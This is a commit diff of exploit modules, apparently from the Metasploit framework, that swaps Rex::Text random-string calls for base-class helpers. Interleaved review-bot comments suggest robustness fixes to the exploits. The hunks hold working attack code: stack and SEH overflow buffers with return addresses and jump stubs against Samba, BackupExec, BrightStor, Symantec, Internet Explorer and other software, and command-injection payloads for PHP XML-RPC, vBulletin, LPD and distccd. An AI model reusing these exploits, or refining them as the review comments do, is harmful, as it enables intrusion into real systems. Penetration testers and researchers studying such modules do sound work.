updated modules to use base class rand_xxx methods
git-svn-id: file:///home/svn/framework3/trunk@4498 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
cfd9cbb1f1
commit
d42194e14a
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -74,7 +74,7 @@ class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
|
||||||
print_status("Sending our job request with embedded command string...")
|
print_status("Sending our job request with embedded command string...")
|
||||||
# Send the job request with the encoded command
|
# Send the job request with the encoded command
|
||||||
sock.put(
|
sock.put(
|
||||||
"\x02" + Rex::Text.rand_text_alphanumeric(3) + jid +
|
"\x02" + rand_text_alphanumeric(3) + jid +
|
||||||
"`" + payload.encoded + "`\n"
|
"`" + payload.encoded + "`\n"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
@ -85,7 +85,7 @@ class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Sending our fake control file...")
|
print_status("Sending our fake control file...")
|
||||||
sock.put("\x02 32 cfA" + Rex::Text.rand_text_alphanumeric(8) + "\n")
|
sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
|
||||||
res = sock.get_once(1)
|
res = sock.get_once(1)
|
||||||
if (res[0] != 0)
|
if (res[0] != 0)
|
||||||
print_status("The target did not accept our control file")
|
print_status("The target did not accept our control file")
|
||||||
|
@ -95,7 +95,7 @@ class Exploits::Hpux::Lpd::CleanupExec < Msf::Exploit::Remote
|
||||||
print_status("Forcing an error and hijacking the cleanup routine...")
|
print_status("Forcing an error and hijacking the cleanup routine...")
|
||||||
|
|
||||||
begin
|
begin
|
||||||
sock.put(Rex::Text.rand_text_alphanumeric(16384))
|
sock.put(rand_text_alphanumeric(16384))
|
||||||
disconnect
|
disconnect
|
||||||
rescue
|
rescue
|
||||||
end
|
end
|
||||||
|
|
|
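Review bot: `res = sock.get_once(1)` can return nil when the peer closes the connection or the read times out, and the following `if (res[0] != 0)` then raises NoMethodError instead of reaching the existing "did not accept our control file" path; `if (res.nil? or res[0,1] != "\x00")` keeps that path and also stops relying on Ruby 1.8's String#[] returning an Integer, which would make the current comparison always true on later Rubies. The same unchecked `get_once` result appears in DISTCCD_EXEC (`res = sock.get_once(24, 5)`), though its use is outside that hunk. The enclosing method starts and ends outside the hunk.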
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -58,7 +58,7 @@ class Exploits::Linux::Http::PeerCast_URL < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
pat = Rex::Text.rand_text_alphanumeric(780)
|
pat = rand_text_alphanumeric(780)
|
||||||
pat << [target.ret].pack('V')
|
pat << [target.ret].pack('V')
|
||||||
pat << payload.encoded
|
pat << payload.encoded
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -88,7 +88,7 @@ class Exploits::Osx::Afp::AFPLoginExt < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
|
|
||||||
# Add the user type and afp path
|
# Add the user type and afp path
|
||||||
afp << "\x03" + [9].pack('n') + Rex::Text.rand_text_alphanumeric(9)
|
afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
|
||||||
afp << "\x03" + [path.length].pack('n') + path
|
afp << "\x03" + [path.length].pack('n') + path
|
||||||
|
|
||||||
sock.write(afp)
|
sock.write(afp)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -99,7 +99,7 @@ class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
||||||
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
||||||
head[6, 2] = [1200].pack('n')
|
head[6, 2] = [1200].pack('n')
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(1200, payload_badchars)
|
buf = rand_text_english(1200, payload_badchars)
|
||||||
|
|
||||||
# Return back to the stack either directly or via system lib
|
# Return back to the stack either directly or via system lib
|
||||||
buf[0, 112] = [target.ret].pack('N') * (112/4)
|
buf[0, 112] = [target.ret].pack('N') * (112/4)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -75,9 +75,9 @@ class Exploits::Osx::Browser::Safar_Metadata_Archive < Msf::Exploit::Remote
|
||||||
|
|
||||||
def generate_zip(shellcode)
|
def generate_zip(shellcode)
|
||||||
tdir = ENV['HOME'] || ENV['TMPDIR'] || '/tmp'
|
tdir = ENV['HOME'] || ENV['TMPDIR'] || '/tmp'
|
||||||
tnam = Rex::Text.rand_text_alphanumeric(8)
|
tnam = rand_text_alphanumeric(8)
|
||||||
tdir += '/' + tnam
|
tdir += '/' + tnam
|
||||||
tmov = Rex::Text.rand_text_alphanumeric(8) + '.mov'
|
tmov = rand_text_alphanumeric(8) + '.mov'
|
||||||
|
|
||||||
FileUtils.mkdir(tdir, :mode => 0755)
|
FileUtils.mkdir(tdir, :mode => 0755)
|
||||||
FileUtils.cd(tdir)
|
FileUtils.cd(tdir)
|
||||||
|
|
|
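Review bot: generate_zip stages its scratch directory under the operator's home directory first (`tdir = ENV['HOME'] || ENV['TMPDIR'] || '/tmp'`) and then calls `FileUtils.cd(tdir)`, which changes the working directory of the whole framework process; no restore is visible in the hunk, and the method continues past it, so I cannot tell whether it is reverted. Preferring TMPDIR over HOME and using the block form `Dir.chdir(tdir) do ... end` would scope the change to this method. `FileUtils.mkdir` also raises if the randomly named directory already exists, which is unlikely with an 8-character name but is not handled.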
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -96,7 +96,7 @@ class Exploits::Osx::Ftp::WebStarFTPUserOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
# r1+120 = 408
|
# r1+120 = 408
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
|
buf = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
|
||||||
buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120
|
buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120
|
||||||
buf[basel , 4] = [ target['Rets'][1] ].pack('N') # getgid()
|
buf[basel , 4] = [ target['Rets'][1] ].pack('N') # getgid()
|
||||||
buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30
|
buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -78,7 +78,7 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
|
||||||
smb_login
|
smb_login
|
||||||
|
|
||||||
# 1988 is required for findrecv shellcode
|
# 1988 is required for findrecv shellcode
|
||||||
pattern = Rex::Text.rand_text_english(1988)
|
pattern = rand_text_english(1988)
|
||||||
|
|
||||||
# This stream covers the framepointer and the return address
|
# This stream covers the framepointer and the return address
|
||||||
pattern[1195, 64] = [curr_ret].pack('N') * 16
|
pattern[1195, 64] = [curr_ret].pack('N') * 16
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -92,7 +92,7 @@ class Exploits::Solaris::Samba::Trans2Open_Overflow < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
|
|
||||||
# This value *must* be 1988 to allow findrecv shellcode to work
|
# This value *must* be 1988 to allow findrecv shellcode to work
|
||||||
pattern = Rex::Text.rand_text_english(1988)
|
pattern = rand_text_english(1988)
|
||||||
|
|
||||||
#
|
#
|
||||||
# This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
|
# This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -69,7 +69,7 @@ class Exploits::Solaris::Sunrpc::SadmindExec < Msf::Exploit::Remote
|
||||||
|
|
||||||
if !datastore['HOSTNAME']
|
if !datastore['HOSTNAME']
|
||||||
print_status('attempting to determine hostname')
|
print_status('attempting to determine hostname')
|
||||||
response = sadmind_request(Rex::Text.rand_text_alpha(rand(10) + 1), "true")
|
response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")
|
||||||
|
|
||||||
if !response
|
if !response
|
||||||
print_error('no response')
|
print_error('no response')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -81,7 +81,7 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
"\xff\xfa\x27\x00" +
|
"\xff\xfa\x27\x00" +
|
||||||
"\x00TTYPROMPT" +
|
"\x00TTYPROMPT" +
|
||||||
"\x01" +
|
"\x01" +
|
||||||
Rex::Text.rand_text_alphanumeric(6) +
|
rand_text_alphanumeric(6) +
|
||||||
"\xff\xf0"
|
"\xff\xf0"
|
||||||
|
|
||||||
sock.put(req)
|
sock.put(req)
|
||||||
|
@ -91,7 +91,7 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
|
|
||||||
req = datastore['USER']
|
req = datastore['USER']
|
||||||
64.times {
|
64.times {
|
||||||
req += Rex::Text.rand_text(rand(10) + 1, '', " \t") + Rex::Text.rand_text_alpha(rand(10) + 1)
|
req += rand_text(rand(10) + 1, '', " \t") + rand_text_alpha(rand(10) + 1)
|
||||||
}
|
}
|
||||||
req += "\n"
|
req += "\n"
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -61,7 +61,7 @@ class Exploits::Unix::Misc::DISTCCD_EXEC < Msf::Exploit::Remote
|
||||||
distcmd = dist_cmd("sh", "-c", payload.encoded);
|
distcmd = dist_cmd("sh", "-c", payload.encoded);
|
||||||
sock.put(distcmd)
|
sock.put(distcmd)
|
||||||
|
|
||||||
dtag = Rex::Text.rand_text_alphanumeric(10)
|
dtag = rand_text_alphanumeric(10)
|
||||||
sock.put("DOTI0000000A#{dtag}\n")
|
sock.put("DOTI0000000A#{dtag}\n")
|
||||||
|
|
||||||
res = sock.get_once(24, 5)
|
res = sock.get_once(24, 5)
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -63,7 +63,7 @@ class Exploits::Unix::Webapp::PhpvBulletinTemplateName < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def go(command)
|
def go(command)
|
||||||
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
|
wrapper = rand_text_alphanumeric(rand(128)+32)
|
||||||
|
|
||||||
command = "echo #{wrapper};#{command};echo #{wrapper};"
|
command = "echo #{wrapper};#{command};echo #{wrapper};"
|
||||||
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -66,17 +66,17 @@ class Exploits::Unix::Webapp::PhpXmlrpcEval < Msf::Exploit::Remote
|
||||||
def go(command)
|
def go(command)
|
||||||
|
|
||||||
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
||||||
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
|
wrapper = rand_text_alphanumeric(rand(128)+32)
|
||||||
|
|
||||||
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
|
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
|
||||||
|
|
||||||
xml =
|
xml =
|
||||||
'<?xml version="1.0"?>' +
|
'<?xml version="1.0"?>' +
|
||||||
"<methodCall>" +
|
"<methodCall>" +
|
||||||
"<methodName>"+ Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
|
"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
|
||||||
"<params><param>" +
|
"<params><param>" +
|
||||||
"<name>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
|
"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
|
||||||
"<value>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</value>" +
|
"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
|
||||||
"</param></params>" +
|
"</param></params>" +
|
||||||
"</methodCall>";
|
"</methodCall>";
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -70,18 +70,18 @@ class Exploits::Windows::Antivirus::Symantec_Rtvscan < Msf::Exploit::Remote
|
||||||
header << "\x00\x24\x00\x14\xb7\xc9\xd2\xd9"
|
header << "\x00\x24\x00\x14\xb7\xc9\xd2\xd9"
|
||||||
header << "\x3e\x33\xef\x34\x25\x1f\x43\x00"
|
header << "\x3e\x33\xef\x34\x25\x1f\x43\x00"
|
||||||
|
|
||||||
crufta = Rex::Text.rand_text_alphanumeric(512)
|
crufta = rand_text_alphanumeric(512)
|
||||||
cruftb = Rex::Text.rand_text_alphanumeric(514)
|
cruftb = rand_text_alphanumeric(514)
|
||||||
cruftc = payload.encoded + Rex::Text.rand_text_alphanumeric(513 - payload.encoded.length)
|
cruftc = payload.encoded + rand_text_alphanumeric(513 - payload.encoded.length)
|
||||||
cruftd = Rex::Text.rand_text_alphanumeric(495)
|
cruftd = rand_text_alphanumeric(495)
|
||||||
|
|
||||||
cruftd[479, 2] = "\xeb\x06"
|
cruftd[479, 2] = "\xeb\x06"
|
||||||
cruftd[483, 4] = [target.ret].pack('V')
|
cruftd[483, 4] = [target.ret].pack('V')
|
||||||
cruftd[487, 5] = [0xe8, -1000].pack('CV')
|
cruftd[487, 5] = [0xe8, -1000].pack('CV')
|
||||||
|
|
||||||
cruftd << Rex::Text.rand_text_alphanumeric(21)
|
cruftd << rand_text_alphanumeric(21)
|
||||||
crufte = Rex::Text.rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
|
crufte = rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
|
||||||
crufte << Rex::Text.rand_text_alphanumeric(504) + "\x00\x00"
|
crufte << rand_text_alphanumeric(504) + "\x00\x00"
|
||||||
|
|
||||||
overflow = [ crufta.length ].pack('v') + crufta
|
overflow = [ crufta.length ].pack('v') + crufta
|
||||||
overflow << [ cruftb.length ].pack('v') + cruftb
|
overflow << [ cruftb.length ].pack('v') + cruftb
|
||||||
|
|
|
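Review bot: `cruftc = payload.encoded + rand_text_alphanumeric(513 - payload.encoded.length)` passes a negative length when the encoded payload exceeds 513 bytes; this is presumably prevented by the module's payload space limit, which is outside the hunk, but an explicit check would make the assumption visible, e.g. `raise RuntimeError, "payload exceeds 513 bytes" if payload.encoded.length > 513`. The same dependence on an out-of-view size limit appears in BackupExecAgentOverflow (`password[ 3536 - payload.encoded.length, payload.encoded.length ]`) and BrightstorSQLAgentOverflow (`buf[ 696, payload.encoded.length ]`), where an oversized payload would silently corrupt the buffer layout rather than fail. The enclosing method starts and ends outside the hunk.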
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -113,7 +113,7 @@ class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def prep_ark5
|
def prep_ark5
|
||||||
data = Rex::Text.rand_text_english(4096, payload_badchars)
|
data = rand_text_english(4096, payload_badchars)
|
||||||
data[1176, 4] = [target['Rets'][0]].pack('V')
|
data[1176, 4] = [target['Rets'][0]].pack('V')
|
||||||
data[1172, 2] = "\xeb\xf9"
|
data[1172, 2] = "\xeb\xf9"
|
||||||
data[1167, 5] = "\xe98" + [-1172].pack('V')
|
data[1167, 5] = "\xe98" + [-1172].pack('V')
|
||||||
|
@ -121,7 +121,7 @@ class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def prep_ark4
|
def prep_ark4
|
||||||
data = Rex::Text.rand_text_english(4096, payload_badchars)
|
data = rand_text_english(4096, payload_badchars)
|
||||||
seh = generate_seh_payload( target['Rets'][0] )
|
seh = generate_seh_payload( target['Rets'][0] )
|
||||||
data[ 96, seh.length] = seh
|
data[ 96, seh.length] = seh
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -100,7 +100,7 @@ class Exploits::Windows::Backupexec::BackupExecAgentOverflow < Msf::Exploit::Rem
|
||||||
resp = ndmp_recv()
|
resp = ndmp_recv()
|
||||||
|
|
||||||
username = 'X' * 512
|
username = 'X' * 512
|
||||||
password = Rex::Text.rand_text_alphanumeric(8192)
|
password = rand_text_alphanumeric(8192)
|
||||||
|
|
||||||
# Place our payload early in the request and jump backwards into it
|
# Place our payload early in the request and jump backwards into it
|
||||||
password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||||
|
|
|
@ -110,7 +110,7 @@ class Exploits::Windows::Brightstor::BrightstorDiscoTcp < Msf::Exploit::Remote
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(4096)
|
buf = rand_text_english(4096)
|
||||||
|
|
||||||
# Overwriting the return address works well, but the only register
|
# Overwriting the return address works well, but the only register
|
||||||
# pointing back to our code is 'esp'. The following stub overwrites
|
# pointing back to our code is 'esp'. The following stub overwrites
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -95,7 +95,7 @@ class Exploits::Windows::Brightstor::BrightstorSQLAgentOverflow < Msf::Exploit::
|
||||||
# 3168 == return address
|
# 3168 == return address
|
||||||
# 3172 == esp @ 0293ff8c (2476 from good data)
|
# 3172 == esp @ 0293ff8c (2476 from good data)
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(3288, payload_badchars)
|
buf = rand_text_english(3288, payload_badchars)
|
||||||
buf[ 696, payload.encoded.length ] = payload.encoded
|
buf[ 696, payload.encoded.length ] = payload.encoded
|
||||||
buf[3168, 4] = [target.ret].pack('V') # jmp esp
|
buf[3168, 4] = [target.ret].pack('V') # jmp esp
|
||||||
buf[3172, 5] = "\xe9\x4f\xf6\xff\xff" # jmp -2476
|
buf[3172, 5] = "\xe9\x4f\xf6\xff\xff" # jmp -2476
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -96,11 +96,11 @@ class Exploits::Windows::Browser::IE_CreateObject < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
# Build out the HTML response page
|
# Build out the HTML response page
|
||||||
var_html = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_html = rand_text_alpha(rand(30)+2)
|
||||||
var_func_exploit = Rex::Text.rand_text_alpha(rand(30)+2);
|
var_func_exploit = rand_text_alpha(rand(30)+2);
|
||||||
var_func_go = Rex::Text.rand_text_alpha(rand(30)+2);
|
var_func_go = rand_text_alpha(rand(30)+2);
|
||||||
var_func_createo = Rex::Text.rand_text_alpha(rand(30)+2);
|
var_func_createo = rand_text_alpha(rand(30)+2);
|
||||||
var_exe_name = Rex::Text.rand_text_alpha(rand(30)+2);
|
var_exe_name = rand_text_alpha(rand(30)+2);
|
||||||
var_objects = ''
|
var_objects = ''
|
||||||
|
|
||||||
# Build the object list based on target selection
|
# Build the object list based on target selection
|
||||||
|
|
|
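Review bot: the new `var_func_exploit = rand_text_alpha(rand(30)+2);` line and the three assignments after it keep trailing semicolons while `var_html = rand_text_alpha(rand(30)+2)` directly above does not; dropping them would match the surrounding Ruby style. The enclosing method starts and ends outside the hunk.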
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -61,7 +61,7 @@ class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote
|
||||||
return if ((p = regenerate_payload(cli)) == nil)
|
return if ((p = regenerate_payload(cli)) == nil)
|
||||||
|
|
||||||
# Create the overflow string
|
# Create the overflow string
|
||||||
pattern = Rex::Text.rand_text_alpha(8192)
|
pattern = rand_text_alpha(8192)
|
||||||
|
|
||||||
# Smash the return address with a bogus pointer
|
# Smash the return address with a bogus pointer
|
||||||
pattern[744, 4] = [0xffffffff].pack('V')
|
pattern[744, 4] = [0xffffffff].pack('V')
|
||||||
|
@ -72,8 +72,8 @@ class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
|
||||||
# Build out the HTML response page
|
# Build out the HTML response page
|
||||||
var_client = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_client = rand_text_alpha(rand(30)+2)
|
||||||
var_html = Rex::Text.rand_text_alpha(rand(30)+2)
|
var_html = rand_text_alpha(rand(30)+2)
|
||||||
|
|
||||||
content = %Q|
|
content = %Q|
|
||||||
<html >
|
<html >
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -89,18 +89,18 @@ class Exploits::Windows::Browser::McAfeeMcSubMgrVsprintf < Msf::Exploit::Remote
|
||||||
|
|
||||||
# Build out our overflow buffer
|
# Build out our overflow buffer
|
||||||
buf =
|
buf =
|
||||||
Rex::Text.rand_text(2972, payload_badchars) +
|
rand_text(2972, payload_badchars) +
|
||||||
[ ret ].pack('V') +
|
[ ret ].pack('V') +
|
||||||
"\x60" + # pusha
|
"\x60" + # pusha
|
||||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||||
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
|
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||||
"\x61" + # popa
|
"\x61" + # popa
|
||||||
p.encoded
|
p.encoded
|
||||||
|
|
||||||
# Generate random variable names
|
# Generate random variable names
|
||||||
vname = Rex::Text.rand_text_alpha(rand(100) + 1)
|
vname = rand_text_alpha(rand(100) + 1)
|
||||||
strname = Rex::Text.rand_text_alpha(rand(100) + 1)
|
strname = rand_text_alpha(rand(100) + 1)
|
||||||
|
|
||||||
# Build out the message
|
# Build out the message
|
||||||
content =
|
content =
|
||||||
|
|
|
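Review bot: the comment `# push byte 0x1` on the three `"\x6a" + rand_char(payload_badchars)` lines does not describe the operand, which is a random byte chosen to avoid payload bad characters; `# push byte <random>` would be accurate. Separately, this hunk (`rand_char`) and Xmplay_Asx (`rand_text_alpha_upper`) are the only callers of the less common wrappers, and a wrapper missing from the base class would surface only as a NameError when the module runs, so it is worth confirming both are defined alongside the `rand_text_*` methods. The enclosing method starts and ends outside the hunk.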
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -66,7 +66,7 @@ class Exploits::Windows::Browser::Mirc_Irc_Url < Msf::Exploit::Remote
|
||||||
# Re-generate the payload
|
# Re-generate the payload
|
||||||
return if ((p = regenerate_payload(cli)) == nil)
|
return if ((p = regenerate_payload(cli)) == nil)
|
||||||
|
|
||||||
filler = Rex::Text.rand_text_alphanumeric(target['Offset'], payload_badchars)
|
filler = rand_text_alphanumeric(target['Offset'], payload_badchars)
|
||||||
seh = generate_seh_payload(target.ret)
|
seh = generate_seh_payload(target.ret)
|
||||||
sploit = filler + seh
|
sploit = filler + seh
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -98,7 +98,7 @@ class Exploits::Windows::Browser::MS03_020_Ie_ObjectType < Msf::Exploit::Remote
|
||||||
content =
|
content =
|
||||||
"<html>" + egg + egg + p.encoded + "\n" +
|
"<html>" + egg + egg + p.encoded + "\n" +
|
||||||
"<object type=\"////////////////////////////////////////////////////////////////" +
|
"<object type=\"////////////////////////////////////////////////////////////////" +
|
||||||
Rex::Text.rand_text_alphanumeric(8) + ret + clean +
|
rand_text_alphanumeric(8) + ret + clean +
|
||||||
make_nops(8) + hunter[0] + "\">" +
|
make_nops(8) + hunter[0] + "\">" +
|
||||||
"</object>" +
|
"</object>" +
|
||||||
"</html>"
|
"</html>"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -89,7 +89,7 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
|
||||||
html =
|
html =
|
||||||
"<html><meta http-equiv='refresh' content='0; URL=" +
|
"<html><meta http-equiv='refresh' content='0; URL=" +
|
||||||
get_resource + '/' +
|
get_resource + '/' +
|
||||||
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
|
rand_text_alphanumeric(rand(80)+16) +
|
||||||
".#{ext}'><body>One second please...</body></html>"
|
".#{ext}'><body>One second please...</body></html>"
|
||||||
send_response_html(cli, html)
|
send_response_html(cli, html)
|
||||||
return
|
return
|
||||||
|
@ -178,7 +178,7 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
|
||||||
#
|
#
|
||||||
# Some extra fun padding
|
# Some extra fun padding
|
||||||
#
|
#
|
||||||
Rex::Text.rand_text(rand(16384)+1024)
|
rand_text(rand(16384)+1024)
|
||||||
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
|
@ -190,13 +190,13 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
|
||||||
case type
|
case type
|
||||||
when 0
|
when 0
|
||||||
# CreatePenIndirect
|
# CreatePenIndirect
|
||||||
return [8, 0x02fa].pack('Vv') + Rex::Text.rand_text(10)
|
return [8, 0x02fa].pack('Vv') + rand_text(10)
|
||||||
when 1
|
when 1
|
||||||
# CreateBrushIndirect
|
# CreateBrushIndirect
|
||||||
return [7, 0x02fc].pack('Vv') + Rex::Text.rand_text(8)
|
return [7, 0x02fc].pack('Vv') + rand_text(8)
|
||||||
else
|
else
|
||||||
# Rectangle
|
# Rectangle
|
||||||
return [7, 0x041b].pack('Vv') + Rex::Text.rand_text(8)
|
return [7, 0x041b].pack('Vv') + rand_text(8)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id:$
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -84,24 +84,24 @@ class Exploits::Windows::Browser::MS06_013_CreateTextRange < Msf::Exploit::Remot
|
||||||
nops = Rex::Text.to_unescape(make_nops(4))
|
nops = Rex::Text.to_unescape(make_nops(4))
|
||||||
|
|
||||||
# Generate a random XML namespace for VML
|
# Generate a random XML namespace for VML
|
||||||
xmlns = Rex::Text.rand_text_alpha(rand(30)+2)
|
xmlns = rand_text_alpha(rand(30)+2)
|
||||||
|
|
